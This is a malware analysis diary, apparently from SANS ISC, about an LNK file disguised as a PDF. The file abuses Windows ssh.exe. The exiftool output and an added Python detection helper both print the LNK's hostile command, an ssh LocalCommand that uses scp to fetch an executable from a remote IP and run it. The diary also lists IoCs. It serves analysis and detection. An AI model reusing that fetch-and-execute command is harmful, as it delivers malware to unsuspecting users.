This article discusses the use of a malicious LNK file named “christmas_slab.pdf.lnk” that exploits the SSH protocol to deliver malware during the holiday season. The file executes a command to transfer and run a malicious executable from a remote server. #CyberSecurity #Malware #SSH

Keypoints :

  • The holiday season is commonly exploited by attackers to deliver malicious content.
  • The file “christmas_slab.pdf.lnk” is an LNK file that executes a command using SSH.
  • SSH support has been added to Windows, providing attackers with new delivery methods.
  • The malicious command transfers a PE file from a remote server and executes it.
  • The IP address associated with the attack belongs to Apple Inc.

MITRE Techniques :

  • Command and Control (T1071): The LNK file uses SSH to connect to a remote server and execute commands.
  • Execution (T1203): The LNK file executes the ssh.exe to transfer and run the malicious executable.

Indicators of Compromise :

  • [file name] christmas_slab.pdf.lnk
  • [ip address] 17[.]43[.]12[.]31
  • [domain] apple.com
  • [file name] christmas-sale.exe
  • [others] ssh.exe
  • Check the article for all found IoCs.

Christmas is at our door and attackers use the holiday season to deliver more and more “gifts” into our mailboxes! I found this interesting file this morning: “christmas_slab.pdf.lnk”[1]. Link files (.lnk) are a classic way to execute something malicious on the victim’s computer, but the technique used here is interesting.

A while ago, Microsoft added SSH support to Windows. I remember the first time I typed “ssh” into a command line and did not get the wonderful message:

'ssh' is not recognized as an internal or external command

Because ssh is available on many computers today, attackers have a new way to deliver malicious content using the SSH (read: SCP) protocol. That’s the technique used by today’s LNK file:

remnux@remnux:/MalwareZoo/20241220$ exiftool christmas_slab.pdf.lnk 
ExifTool Version Number         : 12.76
File Name                       : christmas_slab.pdf.lnk
Directory                       : .
File Size                       : 1992 bytes
File Modification Date/Time     : 2024:12:20 05:39:50-05:00
File Access Date/Time           : 2024:12:20 05:39:50-05:00
File Inode Change Date/Time     : 2024:12:20 05:39:50-05:00
File Permissions                : -rwx------
File Type                       : LNK
File Type Extension             : lnk
MIME Type                       : application/octet-stream
Flags                           : IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, Unicode, TargetMetadata
File Attributes                 : Archive
Create Date                     : 2024:10:09 05:37:10-04:00
Access Date                     : 2024:11:05 07:47:23-05:00
Modify Date                     : 2024:10:09 05:37:10-04:00
Target File Size                : 1243648
Icon Index                      : (none)
Run Window                      : Normal
Hot Key                         : (none)
Target File DOS Name            : ssh.exe
Drive Type                      : Fixed Disk
Drive Serial Number             : 280C-1822
Volume Label                    : 
Local Base Path                 : C:\Windows\System32\OpenSSH\ssh.exe
Relative Path                   : ..\..\..\Windows\System32\OpenSSH\ssh.exe
Working Directory               : C:\Program Files (x86)\Microsoft\Edge\Application
Command Line Arguments          : -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" -o "LocalCommand=scp root@17[.]43[.]12[.]31:/home/revenge/christmas-sale.exe c:\users\public\. && c:\users\public\christmas-sale.exe" revenge@17[.]43[.]12[.]31
Machine ID                      : christmas-destr

This LNK file will spawn ssh.exe with a LocalCommand that uses scp to transfer a PE file to c:\users\public and then execute it. Note the nice executable filename! Once started, the same IP address + username is passed as a parameter to the malicious payload. Unfortunately, the SSH server is down and I wasn’t able to retrieve the file.
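The option pattern above (PermitLocalCommand=yes, a LocalCommand that fetches and runs something, StrictHostKeyChecking=no) is easy to triage automatically. The following helper is an added example, not code from the diary or from the ISC: it parses the argument string of an ssh.exe invocation, as found in an LNK target or in process-creation telemetry, and scores it. The sample command lines are constructed; the first reproduces the LNK's arguments as printed in the article (IP de-fanged), the other two are benign.

```python
"""Flag ssh.exe invocations that abuse LocalCommand to fetch and run a payload.

Added example (not from the ISC diary): a small triage helper that parses the
command-line arguments of ssh.exe and reports the option pattern described in
the article.
"""
import re

# Matches -o "Key=value" (the quoted form the LNK used) or -o Key=value.
OPT_RE = re.compile(r'-o\s+(?:"([^"]*)"|(\S+))')

# First user@host token left once the -o options are removed.
TARGET_RE = re.compile(r'\S+@[^\s:]+')

# Tokens inside a LocalCommand that indicate a download or an execution.
FETCH_OR_RUN = ("scp", "sftp", "curl", "wget", "certutil", "powershell", "cmd", "&&", ".exe")


def parse_ssh_options(cmdline):
    """Return ({option: value}, remainder) for every -o Key=value on the line.

    Option names are lower-cased because ssh treats them case-insensitively.
    """
    opts = {}
    for m in OPT_RE.finditer(cmdline):
        raw = m.group(1) if m.group(1) is not None else m.group(2)
        key, _, value = raw.partition("=")
        opts[key.strip().lower()] = value.strip()
    remainder = OPT_RE.sub("", cmdline)
    return opts, remainder


def analyze_ssh_cmdline(cmdline):
    """Score one ssh.exe argument string and explain why."""
    opts, remainder = parse_ssh_options(cmdline)
    findings = []

    permit = opts.get("permitlocalcommand", "").lower() == "yes"
    local = opts.get("localcommand", "")
    risky_local = any(tok in local.lower() for tok in FETCH_OR_RUN)
    no_hostkey = opts.get("stricthostkeychecking", "").lower() == "no"

    if permit:
        findings.append("PermitLocalCommand=yes: client will run a local command on connect")
    if local:
        findings.append("LocalCommand set: " + local)
    if risky_local:
        findings.append("LocalCommand downloads or executes something")
    if no_hostkey:
        findings.append("StrictHostKeyChecking=no: unknown server accepted silently")

    if permit and local and risky_local:
        severity = "high"
    elif permit or local:
        severity = "medium"
    elif no_hostkey:
        severity = "low"
    else:
        severity = "none"

    target = TARGET_RE.search(remainder)
    return {
        "options": opts,
        "local_command": local,
        "target": target.group(0) if target else None,
        "findings": findings,
        "severity": severity,
    }


# Constructed sample command lines (see lead-in); not captured telemetry.
SAMPLES = {
    "christmas_slab.pdf.lnk": (
        '-o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" '
        '-o "LocalCommand=scp root@17[.]43[.]12[.]31:/home/revenge/christmas-sale.exe '
        'c:\\users\\public\\. && c:\\users\\public\\christmas-sale.exe" revenge@17[.]43[.]12[.]31'
    ),
    "admin-shell": "-p 2222 admin@build-host.example",
    "ci-deploy": '-o "StrictHostKeyChecking=no" deploy@ci.example uptime',
}

if __name__ == "__main__":
    for name, cmdline in SAMPLES.items():
        r = analyze_ssh_cmdline(cmdline)
        print(f"{name}: severity={r['severity']} target={r['target']}")
        for f in r["findings"]:
            print("   -", f)
```

In a hunt, feed the function the CommandLine field of process-creation events whose image is ssh.exe (or the Command Line Arguments field exiftool prints for an LNK); a "high" result is the exact combination seen here, while "low" alone is common in automation and only worth correlating, not alerting on.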

Something else suspicious: the IP belongs to Apple:

NetRange:       17.0.0.0 - 17.255.255.255
CIDR:           17.0.0.0/8
NetName:        APPLE-WWNET
NetHandle:      NET-17-0-0-0-1
Parent:          ()
NetType:        Direct Allocation
OriginAS:
Organization:   Apple Inc. (APPLEC-1-Z)
RegDate:        1990-04-16
Updated:        2023-11-15
Comment:        Geofeed https://ip-geolocation.apple.com
Ref:            https://rdap.arin.net/registry/ip/17.0.0.0

I discovered this file because I started to track the usage of “ssh.exe” in my hunting rules. Let’s hope I will get more hits soon!

[1] https://www.virustotal.com/gui/file/8bd210b33340ee5cdd9031370eed472fcc7cae566752e39408f699644daf8494/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key


Full Research: https://isc.sans.edu/diary/Christmas+Gift+Delivered+Through+SSH/31538/